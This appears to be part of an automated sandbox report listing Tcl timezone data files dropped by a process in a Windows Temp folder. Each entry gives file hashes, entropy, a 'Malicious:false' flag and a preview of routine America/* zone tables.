                                                                                                                                                                                                                                                                                                                                SSDEEP:192:k+iBktTzZSJw5/9/yuvQ+hcrD57X0N41+IestuNEbYkzbXwDTIRqfhXbdXvDXpVS:k+iBmTzZSJw5/9/yuvQ6crD57X0N41+a
                                                                                                                                                                                                                                                                                                                                MD5:9C10496730E961187C33C1AE91C8A60D
                                                                                                                                                                                                                                                                                                                                SHA1:A77E3508859FB6F76A7445CD13CD42348CB4EBC7
                                                                                                                                                                                                                                                                                                                                SHA-256:136F0A49742F30B05B7C6BF3BF014CC999104F4957715D0BEB39F5440D5216DF
                                                                                                                                                                                                                                                                                                                                SHA-512:70936E65D0B439F6BE6E31E27032F10BA2EB54672647DA615744ABC7A767F197F0C7FDBCCEE0D335CBCECB6855B7BD899D1A5B97BA5083FFA42AF5F30343EA7F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Rainy_River) {. {-9223372036854775808 -22696 0 LMT}. {-2366732504 -21600 0 CST}. {-1632067200 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-923248800 -18000 1 CDT}. {-880214400 -18000 0 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {136368000 -18000 1 CDT}. {152089200 -21600 0 CST}. {167817600 -18000 1 CDT}. {183538800 -21600 0 CST}. {199267200 -18000 1 CDT}. {215593200 -21600 0 CST}. {230716800 -18000 1 CDT}. {247042800 -21600 0 CST}. {262771200 -18000 1 CDT}. {278492400 -21600 0 CST}. {294220800 -18000 1 CDT}. {309942000 -21600 0 CST}. {325670400 -18000 1 CDT}. {341391600 -21600 0 CST}. {357120000 -18000 1 CDT}. {372841200 -21600 0 CST}. {388569600 -18000 1 CDT}. {404895600 -21600 0 CST}. {420019200 -18000 1 CDT}. {436345200 -21600 0 CST}. {452073600 -18000 1 CDT}. {467794800 -21600 0 CST}. {483523200 -18000 1 CDT}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7366
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.749928775816306
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:vw5/9/yuvQ+hcrD57X0N41+IstuNEbYkzbXwDTIRqfhXbdXvDXpVXVto//q7u37N:vw5/9/yuvQ6crD57X0N41+IstuNEbYkJ
                                                                                                                                                                                                                                                                                                                                MD5:54F6D5098A0CF940F066EADEEA234A57
                                                                                                                                                                                                                                                                                                                                SHA1:20B9FE5F6F70E97420A6D9939AA43C4CCFA8231B
                                                                                                                                                                                                                                                                                                                                SHA-256:AA68088E41A018002E5CE12B14F8910E5ECE5F26D5854092E351BAAC2F90DB2B
                                                                                                                                                                                                                                                                                                                                SHA-512:9EC1AF599604CEE266D9A4377B6CDABF94E61D0177CBC2158122406BF551AE0E3EE4CF147B28A382277B015CCB8F4405DB3EB3AE6425431EBB43CCDE08AEA3E1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Rankin_Inlet) {. {-9223372036854775808 0 0 -00}. {-410227200 -21600 0 CST}. {-147895200 -14400 1 CDDT}. {-131565600 -21600 0 CST}. {325670400 -18000 1 CDT}. {341391600 -21600 0 CST}. {357120000 -18000 1 CDT}. {372841200 -21600 0 CST}. {388569600 -18000 1 CDT}. {404895600 -21600 0 CST}. {420019200 -18000 1 CDT}. {436345200 -21600 0 CST}. {452073600 -18000 1 CDT}. {467794800 -21600 0 CST}. {483523200 -18000 1 CDT}. {499244400 -21600 0 CST}. {514972800 -18000 1 CDT}. {530694000 -21600 0 CST}. {544608000 -18000 1 CDT}. {562143600 -21600 0 CST}. {576057600 -18000 1 CDT}. {594198000 -21600 0 CST}. {607507200 -18000 1 CDT}. {625647600 -21600 0 CST}. {638956800 -18000 1 CDT}. {657097200 -21600 0 CST}. {671011200 -18000 1 CDT}. {688546800 -21600 0 CST}. {702460800 -18000 1 CDT}. {719996400 -21600 0 CST}. {733910400 -18000 1 CDT}. {75205
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1372
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6943875149362064
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQHJeHQc4h1u80V2dBUGphmC17ewGtN3rvIh0VBHZDIykqWoN:5Kh4h19U2dBUGrmO7XGtN3kh0VBHZUnk
                                                                                                                                                                                                                                                                                                                                MD5:1567A3F3419D1A4FCF817A6EDC11769E
                                                                                                                                                                                                                                                                                                                                SHA1:2970F9EDD76B77A843D31F518587C17A05EC4C43
                                                                                                                                                                                                                                                                                                                                SHA-256:3F62246DF3A378815772D9D942033FB235B048B62F5EF52A3DCD6DB3871E0DB5
                                                                                                                                                                                                                                                                                                                                SHA-512:567BEAC48AE0FEEB32FE40EEA73EB4601DBDBF72FA963777E5F5C3E9972E2AD7A359301E80E574592AFB3045414A177D0ABD38DF958BD5317B02D4DFD2DCE607
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Recife) {. {-9223372036854775808 -8376 0 LMT}. {-1767217224 -10800 0 -03}. {-1206957600 -7200 1 -03}. {-1191362400 -10800 0 -03}. {-1175374800 -7200 1 -03}. {-1159826400 -10800 0 -03}. {-633819600 -7200 1 -03}. {-622069200 -10800 0 -03}. {-602283600 -7200 1 -03}. {-591832800 -10800 0 -03}. {-570747600 -7200 1 -03}. {-560210400 -10800 0 -03}. {-539125200 -7200 1 -03}. {-531352800 -10800 0 -03}. {-191365200 -7200 1 -03}. {-184197600 -10800 0 -03}. {-155163600 -7200 1 -03}. {-150069600 -10800 0 -03}. {-128898000 -7200 1 -03}. {-121125600 -10800 0 -03}. {-99954000 -7200 1 -03}. {-89589600 -10800 0 -03}. {-68418000 -7200 1 -03}. {-57967200 -10800 0 -03}. {499748400 -7200 1 -03}. {511236000 -10800 0 -03}. {530593200 -7200 1 -03}. {540266400 -10800 0 -03}. {562129200 -7200 1 -03}. {571197600 -10800 0 -03}. {592974000 -7200 1 -03}. {60
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1723
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.956012642028802
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:56ecDOBDgE+hIZVEa3lGw+6yZgTX+rNO46wYDW:86VlGS8
                                                                                                                                                                                                                                                                                                                                MD5:7D955B277C43D51F19377A91B987FAF9
                                                                                                                                                                                                                                                                                                                                SHA1:F2F3E11E955C3E58E21654F3D841B5B1528C0913
                                                                                                                                                                                                                                                                                                                                SHA-256:A1FA7BF002B3BA8DCA4D52AA0BB41C047DDAF88B2E542E1FCF81CB3AAF91AA75
                                                                                                                                                                                                                                                                                                                                SHA-512:719DEE7A932EDB9255D711E82AC0CA3FCFB07AF3EFE2EE0D887D7137F6059BEBE07F85D910CC0005391D244B4EADA16257BE49787938386FD4B5DB6D8E31D513
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Regina) {. {-9223372036854775808 -25116 0 LMT}. {-2030202084 -25200 0 MST}. {-1632063600 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1251651600 -21600 1 MDT}. {-1238349600 -25200 0 MST}. {-1220202000 -21600 1 MDT}. {-1206900000 -25200 0 MST}. {-1188752400 -21600 1 MDT}. {-1175450400 -25200 0 MST}. {-1156698000 -21600 1 MDT}. {-1144000800 -25200 0 MST}. {-1125248400 -21600 1 MDT}. {-1111946400 -25200 0 MST}. {-1032714000 -21600 1 MDT}. {-1016992800 -25200 0 MST}. {-1001264400 -21600 1 MDT}. {-986148000 -25200 0 MST}. {-969814800 -21600 1 MDT}. {-954093600 -25200 0 MST}. {-937760400 -21600 1 MDT}. {-922039200 -25200 0 MST}. {-906310800 -21600 1 MDT}. {-890589600 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-748450800 -21600 1 MDT}. {-732729600 -25200 0 MST}. {-715791600 -21600 1 MDT}
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7362
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7460671071064846
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:iw5/9/yuvQ+hcrD57X0N41+IstuNESkzbXwDTIRqfhXbdXvDXpVXVto//q7u379L:iw5/9/yuvQ6crD57X0N41+IstuNESkzV
                                                                                                                                                                                                                                                                                                                                MD5:07FFF43B350D520D13D91701618AD72E
                                                                                                                                                                                                                                                                                                                                SHA1:8D4B36A6D3257509C209D0B78B58982709FB8807
                                                                                                                                                                                                                                                                                                                                SHA-256:39E13235F87A1B8621ADA62C9AD2EBF8E17687C5533658E075EFA70A04D5C78D
                                                                                                                                                                                                                                                                                                                                SHA-512:37397A2621F0A1EA6B46F6769D583CAEA9703924A2C652B8B58FA4C7DBA8E789BA8FE442FB2C77504E495617591FB138AD733063E3A4A0153ED2B26D4B863018
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Resolute) {. {-9223372036854775808 0 0 -00}. {-704937600 -21600 0 CST}. {-147895200 -14400 1 CDDT}. {-131565600 -21600 0 CST}. {325670400 -18000 1 CDT}. {341391600 -21600 0 CST}. {357120000 -18000 1 CDT}. {372841200 -21600 0 CST}. {388569600 -18000 1 CDT}. {404895600 -21600 0 CST}. {420019200 -18000 1 CDT}. {436345200 -21600 0 CST}. {452073600 -18000 1 CDT}. {467794800 -21600 0 CST}. {483523200 -18000 1 CDT}. {499244400 -21600 0 CST}. {514972800 -18000 1 CDT}. {530694000 -21600 0 CST}. {544608000 -18000 1 CDT}. {562143600 -21600 0 CST}. {576057600 -18000 1 CDT}. {594198000 -21600 0 CST}. {607507200 -18000 1 CDT}. {625647600 -21600 0 CST}. {638956800 -18000 1 CDT}. {657097200 -21600 0 CST}. {671011200 -18000 1 CDT}. {688546800 -21600 0 CST}. {702460800 -18000 1 CDT}. {719996400 -21600 0 CST}. {733910400 -18000 1 CDT}. {752050800
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1075
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7557219407321303
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQYEeH5yyss/u/C5/ukCI/uiCk/u8CHe/uOCXs/um4Co/uN3Cc/ux8CL/uiFCy/i:5q5xs5IlTToo4mdGFtapG8dtedkFL
                                                                                                                                                                                                                                                                                                                                MD5:9AA66AEB91380EFD3313338A2DCBE432
                                                                                                                                                                                                                                                                                                                                SHA1:2D86915D1F331CC7050BBFAAE3315CE1440813C1
                                                                                                                                                                                                                                                                                                                                SHA-256:53DB45CF4CB369DA06C31478A793E787541DA0E77C042EBC7A10175A6BB6EFF6
                                                                                                                                                                                                                                                                                                                                SHA-512:C9B4F6544B4A1E77BFF6D423A9AD5E003E32FA77B00ECC2A7AF6D2279ACC849ABE331E5DE27C450A6BF86ECC2450CEBFAB4880AB69C54649D4C7EE0AF05CD377
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Rio_Branco) {. {-9223372036854775808 -16272 0 LMT}. {-1767209328 -18000 0 -05}. {-1206950400 -14400 1 -05}. {-1191355200 -18000 0 -05}. {-1175367600 -14400 1 -05}. {-1159819200 -18000 0 -05}. {-633812400 -14400 1 -05}. {-622062000 -18000 0 -05}. {-602276400 -14400 1 -05}. {-591825600 -18000 0 -05}. {-570740400 -14400 1 -05}. {-560203200 -18000 0 -05}. {-539118000 -14400 1 -05}. {-531345600 -18000 0 -05}. {-191358000 -14400 1 -05}. {-184190400 -18000 0 -05}. {-155156400 -14400 1 -05}. {-150062400 -18000 0 -05}. {-128890800 -14400 1 -05}. {-121118400 -18000 0 -05}. {-99946800 -14400 1 -05}. {-89582400 -18000 0 -05}. {-68410800 -14400 1 -05}. {-57960000 -18000 0 -05}. {499755600 -14400 1 -05}. {511243200 -18000 0 -05}. {530600400 -14400 1 -05}. {540273600 -18000 0 -05}. {562136400 -14400 1 -05}. {571204800 -18000 0 -05}. {590040000 -
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):214
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.752946571641783
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7/MdVAIgp/MOF290rI5290/Msn:MBaIMY/M4p/MOF290r190/Ms
                                                                                                                                                                                                                                                                                                                                MD5:4FC460A084DF33A73F2F87B7962B0084
                                                                                                                                                                                                                                                                                                                                SHA1:45E70D5D68FC2DE0ACFF76B062ADA17E0021460F
                                                                                                                                                                                                                                                                                                                                SHA-256:D1F5FFD2574A009474230E0AA764256B039B1D78D91A1CB944B21776377B5B70
                                                                                                                                                                                                                                                                                                                                SHA-512:40045420FE88FA54DE4A656534C0A51357FBAB3EA3B9120DA15526A9DEC7EEC2C9799F4D9A72B6050474AD67490BC28540FDA0F17B7FCAF125D41CBCA96ECCDE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Cordoba)]} {. LoadTimeZoneFile America/Argentina/Cordoba.}.set TZData(:America/Rosario) $TZData(:America/Argentina/Cordoba).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):189
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.820569634622523
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0qfSwVAIg20qfo2IAcGEtX2exp4IAcGEqfu:SlSWB9IZaM3y7eHVAIgpeo290tX2U49Q
                                                                                                                                                                                                                                                                                                                                MD5:75EA3845AFED3FBBF8496824A353DA32
                                                                                                                                                                                                                                                                                                                                SHA1:207A1520F041B09CCD5034E6E87D3F7A4FBD460E
                                                                                                                                                                                                                                                                                                                                SHA-256:2FACC167377FC1F592D2926829EB2980F58BE38D50424F64DFA04A2ECBBE1559
                                                                                                                                                                                                                                                                                                                                SHA-512:B9D4DB95CEA1DADCE27264BBD198676465854E9C55D6BB175966D860D9AF7014F6635A945510602C0A9FBF08596B064DAE7D30589886960F06B2F8E69786CFF6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Tijuana)]} {. LoadTimeZoneFile America/Tijuana.}.set TZData(:America/Santa_Isabel) $TZData(:America/Tijuana).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1043
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7336343389566795
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQceUh8Sos/USws/QSI/LHSD/vOSy/WS3o/aS2/vSh/TSSX/WcSp/ySZd/YlSj/X:57SaSwXS4SqSbS3JSySxSxcSESAlSQSn
                                                                                                                                                                                                                                                                                                                                MD5:8F5EAA4F5099B82EDD68893C5D99A0EF
                                                                                                                                                                                                                                                                                                                                SHA1:1B21DAD0CD54E083A6EADCFD57CA8F58759189AD
                                                                                                                                                                                                                                                                                                                                SHA-256:1A46357BC4FE682AF78FFAB10A6A88893BEF50AECC6ACA217A5EBC1B98C01C07
                                                                                                                                                                                                                                                                                                                                SHA-512:2C82822CCA208E900383A1B55882BFC3559EC116C5B5AD2452BA367594AEF36F34C316FFA18B2BAB71A82FC382559069385947548EE9902FEDCDED084801ABF2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Santarem) {. {-9223372036854775808 -13128 0 LMT}. {-1767212472 -14400 0 -04}. {-1206954000 -10800 1 -04}. {-1191358800 -14400 0 -04}. {-1175371200 -10800 1 -04}. {-1159822800 -14400 0 -04}. {-633816000 -10800 1 -04}. {-622065600 -14400 0 -04}. {-602280000 -10800 1 -04}. {-591829200 -14400 0 -04}. {-570744000 -10800 1 -04}. {-560206800 -14400 0 -04}. {-539121600 -10800 1 -04}. {-531349200 -14400 0 -04}. {-191361600 -10800 1 -04}. {-184194000 -14400 0 -04}. {-155160000 -10800 1 -04}. {-150066000 -14400 0 -04}. {-128894400 -10800 1 -04}. {-121122000 -14400 0 -04}. {-99950400 -10800 1 -04}. {-89586000 -14400 0 -04}. {-68414400 -10800 1 -04}. {-57963600 -14400 0 -04}. {499752000 -10800 1 -04}. {511239600 -14400 0 -04}. {530596800 -10800 1 -04}. {540270000 -14400 0 -04}. {562132800 -10800 1 -04}. {571201200 -14400 0 -04}. {590036400 -14
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8582
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4381885094053835
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:LCA/E8pYraRo+kP0pDrMb60RnHqhTxxJA3Ea9c0yq/g2tw5E8Q+iWMFeHpkUu9/6:LRNBnrR59bPYUt
                                                                                                                                                                                                                                                                                                                                MD5:47BED3B60EF45B00267B4D628A2F18C4
                                                                                                                                                                                                                                                                                                                                SHA1:B3827DF571CF2CA16074188CE0E3061E296B8B26
                                                                                                                                                                                                                                                                                                                                SHA-256:51BB12A2397CAD3D412C9E8F3BA06DD98CC379F999DB3D00ED651A84DA1D6D1C
                                                                                                                                                                                                                                                                                                                                SHA-512:8DA831A0EAB180C982395F2BA85952959A676AADA87823E56C5B643FEB7082B6605FD3645D880B19F3F9EE5B25353002309CDB37AE68F1B3A192AE1280B74404
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Santiago) {. {-9223372036854775808 -16966 0 LMT}. {-2524504634 -16966 0 SMT}. {-1892661434 -18000 0 -05}. {-1688410800 -16966 0 SMT}. {-1619205434 -14400 0 -04}. {-1593806400 -16966 0 SMT}. {-1335986234 -18000 0 -05}. {-1335985200 -14400 1 -05}. {-1317585600 -18000 0 -05}. {-1304362800 -14400 1 -05}. {-1286049600 -18000 0 -05}. {-1272826800 -14400 1 -05}. {-1254513600 -18000 0 -05}. {-1241290800 -14400 1 -05}. {-1222977600 -18000 0 -05}. {-1209754800 -14400 1 -05}. {-1191355200 -18000 0 -05}. {-1178132400 -14400 0 -04}. {-870552000 -18000 0 -05}. {-865278000 -14400 0 -04}. {-740520000 -10800 1 -03}. {-736376400 -14400 0 -04}. {-718056000 -18000 0 -05}. {-713649600 -14400 0 -04}. {-36619200 -10800 1 -04}. {-23922000 -14400 0 -04}. {-3355200 -10800 1 -04}. {7527600 -14400 0 -04}. {24465600 -10800 1 -04}. {37767600 -14400 0 -04}. {55
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):595
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.2614212422453726
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp5290/SyJmdHhvPu4/G/uFNM/KMVvMj/+MVvMqx/r0XVvMnUB/B7VvMa6I8/0p:cQ+DJeVu4e/uICEkFvxwdqUBZp965VPO
                                                                                                                                                                                                                                                                                                                                MD5:04F2A2C789E041270354376C3FD90D2D
                                                                                                                                                                                                                                                                                                                                SHA1:D0B89262D559021FAC035A519C96D2A2FA417F9C
                                                                                                                                                                                                                                                                                                                                SHA-256:42EF317EA851A781B041DC1951EA5A3EA1E924149C4B868ECD75F24672B28FA8
                                                                                                                                                                                                                                                                                                                                SHA-512:F8D072527ED38C2FF1C9E08219104213352B2EFA1171C0D1E02B6B1542B4929D0C4640B441326791CC86F23206621CD4E0D3247CBAB1F99B63E65DB667F3DFED
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Santo_Domingo) {. {-9223372036854775808 -16776 0 LMT}. {-2524504824 -16800 0 SDMT}. {-1159773600 -18000 0 EST}. {-100119600 -14400 1 EDT}. {-89668800 -18000 0 EST}. {-5770800 -16200 1 -0430}. {4422600 -18000 0 EST}. {25678800 -16200 1 -0430}. {33193800 -18000 0 EST}. {57733200 -16200 1 -0430}. {64816200 -18000 0 EST}. {89182800 -16200 1 -0430}. {96438600 -18000 0 EST}. {120632400 -16200 1 -0430}. {127974600 -18000 0 EST}. {152082000 -14400 0 AST}. {975823200 -14400 0 AST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7552
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4588792656032914
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:Lam19U2gUGrpzsVE0OjmicnyVkHZWWWE/+ZqPuWcBpR4xHtMlAbGCoGzvGmFGgh4:L3Yc8u9U
                                                                                                                                                                                                                                                                                                                                MD5:DEA27A3FE65A22BE42A97C6AB58E9687
                                                                                                                                                                                                                                                                                                                                SHA1:CD50184C4D1739CF5568E21683980FC63C9BFF24
                                                                                                                                                                                                                                                                                                                                SHA-256:AFA706258270F20F9317FF5B84957A2DF77842D564922C15DC302F7A8AB59CEC
                                                                                                                                                                                                                                                                                                                                SHA-512:34C306EC889C10988B3D9C236903417BCA1590E96CD60AE700882C064CCC410132265F106BB10D9593AFFA32B923728FBDDFB6DEE77CAF4A058C877F4D5F1EF1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Sao_Paulo) {. {-9223372036854775808 -11188 0 LMT}. {-1767214412 -10800 0 -03}. {-1206957600 -7200 1 -03}. {-1191362400 -10800 0 -03}. {-1175374800 -7200 1 -03}. {-1159826400 -10800 0 -03}. {-633819600 -7200 1 -03}. {-622069200 -10800 0 -03}. {-602283600 -7200 1 -03}. {-591832800 -10800 0 -03}. {-570747600 -7200 1 -03}. {-560210400 -10800 0 -03}. {-539125200 -7200 1 -03}. {-531352800 -10800 0 -03}. {-195429600 -7200 1 -02}. {-189381600 -7200 0 -03}. {-184197600 -10800 0 -03}. {-155163600 -7200 1 -03}. {-150069600 -10800 0 -03}. {-128898000 -7200 1 -03}. {-121125600 -10800 0 -03}. {-99954000 -7200 1 -03}. {-89589600 -10800 0 -03}. {-68418000 -7200 1 -03}. {-57967200 -10800 0 -03}. {499748400 -7200 1 -03}. {511236000 -10800 0 -03}. {530593200 -7200 1 -03}. {540266400 -10800 0 -03}. {562129200 -7200 1 -03}. {571197600 -10800 0 -03}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6593
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4670685654529194
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:URW/ukG9UDHaXZgsP/N/LWAWVF20V/VapcJlNcnkF0:BuZUDHaXZgsN/FWVFjHv0
                                                                                                                                                                                                                                                                                                                                MD5:7E7EF4D67CCD455833603F7EF9E374A6
                                                                                                                                                                                                                                                                                                                                SHA1:4AD722F75FC88572DD5A2CD1845FF5F68ED4B58A
                                                                                                                                                                                                                                                                                                                                SHA-256:2B5B2A00793545C8D32437D7DAA2A36B42D3B1B7421054621841E2919F713294
                                                                                                                                                                                                                                                                                                                                SHA-512:0688EB3EBDE78E18EE5E31DE57F1CBE0BF10071A6EDC97D284B2B3E1E22975262190934446C202E90EFD161686F4790342EDDBCACADB3A65B0AC6C1A9099C79F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Scoresbysund) {. {-9223372036854775808 -5272 0 LMT}. {-1686090728 -7200 0 -02}. {323841600 -3600 0 -01}. {338961600 -7200 0 -02}. {354679200 0 0 +00}. {370400400 -3600 0 -01}. {386125200 0 1 +00}. {401850000 -3600 0 -01}. {417574800 0 1 +00}. {433299600 -3600 0 -01}. {449024400 0 1 +00}. {465354000 -3600 0 -01}. {481078800 0 1 +00}. {496803600 -3600 0 -01}. {512528400 0 1 +00}. {528253200 -3600 0 -01}. {543978000 0 1 +00}. {559702800 -3600 0 -01}. {575427600 0 1 +00}. {591152400 -3600 0 -01}. {606877200 0 1 +00}. {622602000 -3600 0 -01}. {638326800 0 1 +00}. {654656400 -3600 0 -01}. {670381200 0 1 +00}. {686106000 -3600 0 -01}. {701830800 0 1 +00}. {717555600 -3600 0 -01}. {733280400 0 1 +00}. {749005200 -3600 0 -01}. {764730000 0 1 +00}. {780454800 -3600 0 -01}. {796179600 0 1 +00}. {811904400 -3600 0 -01}. {828234000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):182
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.840231755053259
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx06RGFwVAIg206RAO0L2IAcGEtOFBx+IAcGE6Ru:SlSWB9IZaM3y7+SwVAIgp+iL290tO09G
                                                                                                                                                                                                                                                                                                                                MD5:65307038DB12A7A447284DF4F3E6A3E8
                                                                                                                                                                                                                                                                                                                                SHA1:DC28D6863986D7A158CEF239D46BE9F5033DF897
                                                                                                                                                                                                                                                                                                                                SHA-256:3FD862C9DB2D5941DFDBA5622CC53487A7FC5039F7012B78D3EE4B58753D078D
                                                                                                                                                                                                                                                                                                                                SHA-512:91BC29B7EC9C49D4020DC26F682D0EFBBBEE83D10D79C766A08C78D5FF04D9C0A09288D9696A378E777B65E0C2C2AC8A218C12F86C45BD6E7B5E204AE5FC2335
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Denver)]} {. LoadTimeZoneFile America/Denver.}.set TZData(:America/Shiprock) $TZData(:America/Denver).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8376
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8793735356495116
